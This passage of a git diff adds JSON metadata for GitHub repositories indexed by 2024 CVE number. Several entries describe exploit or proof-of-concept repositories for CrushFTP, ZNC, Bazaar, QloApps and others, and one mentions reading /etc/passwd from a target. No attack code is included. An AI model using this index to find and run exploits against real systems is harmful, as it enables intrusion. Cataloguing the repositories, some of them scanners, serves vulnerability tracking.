"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jasonthename\/CVE-2024-39248", + "description": "Publication for Cross Site Scripting (XSS) in SimpCMS v0.1 - \/SimpCMS\/admin.php", + "fork": false, + "created_at": "2024-06-26T21:06:56Z", + "updated_at": "2024-06-26T21:20:11Z", + "pushed_at": "2024-06-26T21:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39250.json b/2024/CVE-2024-39250.json new file mode 100644 index 0000000000..c6d26c739b --- /dev/null +++ b/2024/CVE-2024-39250.json @@ -0,0 +1,33 @@ +[ + { + "id": 828336673, + "name": "CVE-2024-39250", + "full_name": "efrann\/CVE-2024-39250", + "owner": { + "login": "efrann", + "id": 44778301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44778301?v=4", + "html_url": "https:\/\/github.com\/efrann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efrann\/CVE-2024-39250", + "description": "CVE-2024-39250 TimeTrax SQLi", + "fork": false, + "created_at": "2024-07-13T20:29:31Z", + "updated_at": "2024-08-02T03:18:34Z", + "pushed_at": "2024-07-23T12:28:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39304.json b/2024/CVE-2024-39304.json new file mode 100644 index 0000000000..eee2808a59 --- /dev/null +++ b/2024/CVE-2024-39304.json @@ -0,0 +1,33 @@ +[ + { + "id": 836297653, + "name": "CVE-2024-39304", + "full_name": "apena-ba\/CVE-2024-39304", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-39304", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:48:57Z", + "updated_at": "2024-08-28T06:24:36Z", + "pushed_at": "2024-07-31T15:09:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39306.json b/2024/CVE-2024-39306.json new file mode 100644 index 0000000000..fe9783451d --- /dev/null +++ b/2024/CVE-2024-39306.json @@ -0,0 +1,33 @@ +[ + { + "id": 836301150, + "name": "CVE-2024-39306", + "full_name": "apena-ba\/CVE-2024-39306", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-39306", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:57:03Z", + "updated_at": "2024-08-28T06:24:27Z", + "pushed_at": "2024-07-31T15:07:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39614.json b/2024/CVE-2024-39614.json new file mode 100644 index 0000000000..b41488ae4d --- /dev/null +++ b/2024/CVE-2024-39614.json @@ -0,0 +1,33 @@ +[ + { + "id": 837370546, + "name": "-CVE-2024-39614", + "full_name": "Abdurahmon3236\/-CVE-2024-39614", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-39614", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:11:29Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-02T20:15:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39689.json b/2024/CVE-2024-39689.json new file mode 100644 index 0000000000..388d9db0ff --- /dev/null +++ b/2024/CVE-2024-39689.json @@ -0,0 +1,33 @@ +[ + { + "id": 774962980, + "name": "InfraTest", + "full_name": "roy-aladin\/InfraTest", + "owner": { + "login": "roy-aladin", + "id": 163787028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163787028?v=4", + "html_url": "https:\/\/github.com\/roy-aladin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/roy-aladin\/InfraTest", + "description": "DO NOT FORK, DEPLOY, OR USE FOR ANYTHING BUT LEARNING. These requirements are vulnerable to CVE-2024-39689", + "fork": false, + "created_at": "2024-03-20T14:16:38Z", + "updated_at": "2024-07-06T17:31:04Z", + "pushed_at": "2024-07-06T17:31:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39700.json b/2024/CVE-2024-39700.json new file mode 100644 index 0000000000..b500780437 --- /dev/null +++ b/2024/CVE-2024-39700.json @@ -0,0 +1,33 @@ +[ + { + "id": 835137529, + "name": "CVE-2024-39700-PoC", + "full_name": "LOURC0D3\/CVE-2024-39700-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-39700-PoC", + "description": "CVE-2024-39700 Proof of Concept", + "fork": false, + "created_at": "2024-07-29T08:33:12Z", + "updated_at": "2024-08-01T06:52:18Z", + "pushed_at": "2024-07-31T04:13:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39844.json b/2024/CVE-2024-39844.json new file mode 100644 index 0000000000..3a244b2a6b --- /dev/null +++ b/2024/CVE-2024-39844.json @@ -0,0 +1,33 @@ +[ + { + "id": 823880170, + "name": "CVE-2024-39844", + "full_name": "ph1ns\/CVE-2024-39844", + "owner": { + "login": "ph1ns", + "id": 165745967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165745967?v=4", + "html_url": "https:\/\/github.com\/ph1ns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph1ns\/CVE-2024-39844", + "description": "CVE-2024-39844 (ZNC < 1.9.1 modtcl RCE)", + "fork": false, + "created_at": "2024-07-03T23:27:25Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-03T23:30:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39908.json b/2024/CVE-2024-39908.json new file mode 100644 index 0000000000..8654e5517b --- /dev/null +++ b/2024/CVE-2024-39908.json @@ -0,0 +1,33 @@ +[ + { + "id": 905905924, + "name": "CVE-2024-39908", + "full_name": "SpiralBL0CK\/CVE-2024-39908", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-39908", + "description": "CVE-2024-39908 full poc", + "fork": false, + "created_at": "2024-12-19T18:59:52Z", + "updated_at": "2024-12-19T19:00:06Z", + "pushed_at": "2024-12-19T19:00:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39914.json b/2024/CVE-2024-39914.json new file mode 100644 index 0000000000..100229481a --- /dev/null +++ b/2024/CVE-2024-39914.json @@ -0,0 +1,33 @@ +[ + { + "id": 906558100, + "name": "FOG-Project", + "full_name": "9874621368\/FOG-Project", + "owner": { + "login": "9874621368", + "id": 154233216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154233216?v=4", + "html_url": "https:\/\/github.com\/9874621368", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9874621368\/FOG-Project", + "description": "FOG Project CVE-2024-39914 命令执行漏洞", + "fork": false, + "created_at": "2024-12-21T08:30:00Z", + "updated_at": "2024-12-21T08:33:57Z", + "pushed_at": "2024-12-21T08:33:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39929.json b/2024/CVE-2024-39929.json new file mode 100644 index 0000000000..09b8870383 --- /dev/null +++ b/2024/CVE-2024-39929.json @@ -0,0 +1,64 @@ +[ + { + "id": 827940099, + "name": "CVE-2024-39929", + "full_name": "rxerium\/CVE-2024-39929", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2024-39929", + "description": "Detection method for Exim vulnerability CVE-2024-39929 ", + "fork": false, + "created_at": "2024-07-12T18:01:30Z", + "updated_at": "2024-10-21T02:30:38Z", + "pushed_at": "2024-10-05T06:17:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835307900, + "name": "CVE-2024-39929", + "full_name": "michael-david-fry\/CVE-2024-39929", + "owner": { + "login": "michael-david-fry", + "id": 4213469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4213469?v=4", + "html_url": "https:\/\/github.com\/michael-david-fry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michael-david-fry\/CVE-2024-39929", + "description": "POC to test CVE-2024-39929 against EXIM mail servers", + "fork": false, + "created_at": "2024-07-29T15:09:53Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-01T16:41:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39943.json b/2024/CVE-2024-39943.json new file mode 100644 index 0000000000..f3d7933cdf --- /dev/null +++ b/2024/CVE-2024-39943.json @@ -0,0 +1,33 @@ +[ + { + "id": 824447243, + "name": "CVE-2024-39943-Poc", + "full_name": "truonghuuphuc\/CVE-2024-39943-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-39943-Poc", + "description": "CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).", + "fork": false, + "created_at": "2024-07-05T06:46:34Z", + "updated_at": "2025-01-03T01:39:39Z", + "pushed_at": "2024-07-07T03:41:03Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40080.json b/2024/CVE-2024-40080.json new file mode 100644 index 0000000000..9834679b45 --- /dev/null +++ b/2024/CVE-2024-40080.json @@ -0,0 +1,33 @@ +[ + { + "id": 838855658, + "name": "CVE-2024-40080", + "full_name": "perras\/CVE-2024-40080", + "owner": { + "login": "perras", + "id": 7707264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7707264?v=4", + "html_url": "https:\/\/github.com\/perras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/perras\/CVE-2024-40080", + "description": "cve discovery proof-of-concept", + "fork": false, + "created_at": "2024-08-06T13:28:53Z", + "updated_at": "2024-08-06T13:32:51Z", + "pushed_at": "2024-08-06T13:32:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40110.json b/2024/CVE-2024-40110.json new file mode 100644 index 0000000000..7fae6087ff --- /dev/null +++ b/2024/CVE-2024-40110.json @@ -0,0 +1,33 @@ +[ + { + "id": 837372055, + "name": "CVE-2024-40110", + "full_name": "Abdurahmon3236\/CVE-2024-40110", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-40110", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:17:25Z", + "updated_at": "2024-08-02T20:20:27Z", + "pushed_at": "2024-08-02T20:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40119.json b/2024/CVE-2024-40119.json new file mode 100644 index 0000000000..5d072ad9cd --- /dev/null +++ b/2024/CVE-2024-40119.json @@ -0,0 +1,33 @@ +[ + { + "id": 829794758, + "name": "nepstech-xpon-router-CVE-2024-40119", + "full_name": "sudo-subho\/nepstech-xpon-router-CVE-2024-40119", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/nepstech-xpon-router-CVE-2024-40119", + "description": "Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.", + "fork": false, + "created_at": "2024-07-17T03:03:42Z", + "updated_at": "2024-07-17T03:10:19Z", + "pushed_at": "2024-07-17T03:10:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40318.json b/2024/CVE-2024-40318.json new file mode 100644 index 0000000000..7329120764 --- /dev/null +++ b/2024/CVE-2024-40318.json @@ -0,0 +1,35 @@ +[ + { + "id": 821134638, + "name": "RCE-QloApps-CVE-2024-40318", + "full_name": "3v1lC0d3\/RCE-QloApps-CVE-2024-40318", + "owner": { + "login": "3v1lC0d3", + "id": 50186884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50186884?v=4", + "html_url": "https:\/\/github.com\/3v1lC0d3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3v1lC0d3\/RCE-QloApps-CVE-2024-40318", + "description": "Remote code execution Vulnerability in QloApps  (version 1.6.0.0)", + "fork": false, + "created_at": "2024-06-27T22:15:16Z", + "updated_at": "2024-07-28T00:11:44Z", + "pushed_at": "2024-07-28T00:11:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "codeinjection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40324.json b/2024/CVE-2024-40324.json new file mode 100644 index 0000000000..5b271e500a --- /dev/null +++ b/2024/CVE-2024-40324.json @@ -0,0 +1,33 @@ +[ + { + "id": 833662029, + "name": "CVE-2024-40324", + "full_name": "aleksey-vi\/CVE-2024-40324", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2024-40324", + "description": null, + "fork": false, + "created_at": "2024-07-25T13:48:22Z", + "updated_at": "2024-07-25T13:57:54Z", + "pushed_at": "2024-07-25T13:57:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40348.json b/2024/CVE-2024-40348.json new file mode 100644 index 0000000000..c1be220650 --- /dev/null +++ b/2024/CVE-2024-40348.json @@ -0,0 +1,64 @@ +[ + { + "id": 831572355, + "name": "CVE-2024-40348", + "full_name": "bigb0x\/CVE-2024-40348", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-40348", + "description": "POC for CVE-2024-40348. Will attempt to read \/etc\/passwd from target", + "fork": false, + "created_at": "2024-07-21T00:54:55Z", + "updated_at": "2025-01-02T17:56:45Z", + "pushed_at": "2024-07-21T09:54:02Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906162913, + "name": "Bazaar_poc", + "full_name": "NingXin2002\/Bazaar_poc", + "owner": { + "login": "NingXin2002", + "id": 138864342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138864342?v=4", + "html_url": "https:\/\/github.com\/NingXin2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NingXin2002\/Bazaar_poc", + "description": "Bazaar v1.4.3 任意文件读取漏洞(CVE-2024-40348)", + "fork": false, + "created_at": "2024-12-20T09:47:12Z", + "updated_at": "2024-12-20T09:49:43Z", + "pushed_at": "2024-12-20T09:49:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4040.json b/2024/CVE-2024-4040.json new file mode 100644 index 0000000000..224bc45159 --- /dev/null +++ b/2024/CVE-2024-4040.json @@ -0,0 +1,533 @@ +[ + { + "id": 790656600, + "name": "CVE-2024-4040", + "full_name": "airbus-cert\/CVE-2024-4040", + "owner": { + "login": "airbus-cert", + "id": 26453405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26453405?v=4", + "html_url": "https:\/\/github.com\/airbus-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/airbus-cert\/CVE-2024-4040", + "description": "Scanner for CVE-2024-4040", + "fork": false, + "created_at": "2024-04-23T09:31:29Z", + "updated_at": "2024-12-06T09:40:39Z", + "pushed_at": "2024-05-17T06:48:43Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 47, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 791624022, + "name": "CVE-2024-4040-Scanner", + "full_name": "tucommenceapousser\/CVE-2024-4040-Scanner", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-4040-Scanner", + "description": "Scanner of vulnerability on crushftp instance", + "fork": false, + "created_at": "2024-04-25T04:01:23Z", + "updated_at": "2024-05-19T22:49:33Z", + "pushed_at": "2024-04-25T04:31:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791636172, + "name": "CVE-2024-4040", + "full_name": "rbih-boulanouar\/CVE-2024-4040", + "owner": { + "login": "rbih-boulanouar", + "id": 79673409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79673409?v=4", + "html_url": "https:\/\/github.com\/rbih-boulanouar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbih-boulanouar\/CVE-2024-4040", + "description": null, + "fork": false, + "created_at": "2024-04-25T04:45:38Z", + "updated_at": "2024-07-30T16:14:52Z", + "pushed_at": "2024-04-25T04:56:50Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791645744, + "name": "CVE-2024-4040", + "full_name": "Mufti22\/CVE-2024-4040", + "owner": { + "login": "Mufti22", + "id": 75854478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75854478?v=4", + "html_url": "https:\/\/github.com\/Mufti22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mufti22\/CVE-2024-4040", + "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.", + "fork": false, + "created_at": "2024-04-25T05:18:06Z", + "updated_at": "2024-06-21T00:12:21Z", + "pushed_at": "2024-04-25T05:21:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792008958, + "name": "CVE-2024-4040-SSTI-LFI-PoC", + "full_name": "Stuub\/CVE-2024-4040-SSTI-LFI-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-4040-SSTI-LFI-PoC", + "description": "CVE-2024-4040 CrushFTP SSTI LFI & Auth Bypass | Full Server Takeover | Wordlist Support", + "fork": false, + "created_at": "2024-04-25T19:51:38Z", + "updated_at": "2024-12-15T22:44:40Z", + "pushed_at": "2024-07-07T23:47:58Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "arbitrary-file-read", + "crushftp", + "crushftp0day", + "cve", + "cve-2024-4040", + "cve-2024-4040-exploit", + "cve-2024-4040-poc", + "cve2024-4040", + "lfi", + "owasp", + "python", + "rce", + "sftp" + ], + "visibility": "public", + "forks": 7, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 793110572, + "name": "CVE-2024-4040", + "full_name": "0xN7y\/CVE-2024-4040", + "owner": { + "login": "0xN7y", + "id": 70061541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xN7y\/CVE-2024-4040", + "description": "exploit for CVE-2024-4040", + "fork": false, + "created_at": "2024-04-28T13:06:01Z", + "updated_at": "2024-10-23T13:17:06Z", + "pushed_at": "2024-04-28T13:06:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793492567, + "name": "CVE-2024-4040-CrushFTP-server", + "full_name": "Praison001\/CVE-2024-4040-CrushFTP-server", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4040-CrushFTP-server", + "description": "Exploit for CVE-2024-4040 affecting CrushFTP server in all versions before 10.7.1 and 11.1.0 on all platforms", + "fork": false, + "created_at": "2024-04-29T10:21:53Z", + "updated_at": "2024-04-29T10:27:07Z", + "pushed_at": "2024-04-29T10:27:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794110110, + "name": "CVE-2024-4040", + "full_name": "Mohammaddvd\/CVE-2024-4040", + "owner": { + "login": "Mohammaddvd", + "id": 108727157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108727157?v=4", + "html_url": "https:\/\/github.com\/Mohammaddvd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mohammaddvd\/CVE-2024-4040", + "description": "Exploit CrushFTP CVE-2024-4040", + "fork": false, + "created_at": "2024-04-30T13:27:34Z", + "updated_at": "2024-09-18T08:50:19Z", + "pushed_at": "2024-04-30T13:36:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794593495, + "name": "CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "full_name": "jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "description": null, + "fork": false, + "created_at": "2024-05-01T14:42:39Z", + "updated_at": "2024-06-06T11:58:36Z", + "pushed_at": "2024-05-02T09:58:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795736659, + "name": "CVE-2024-4040", + "full_name": "gotr00t0day\/CVE-2024-4040", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4040", + "description": "A server side template injection 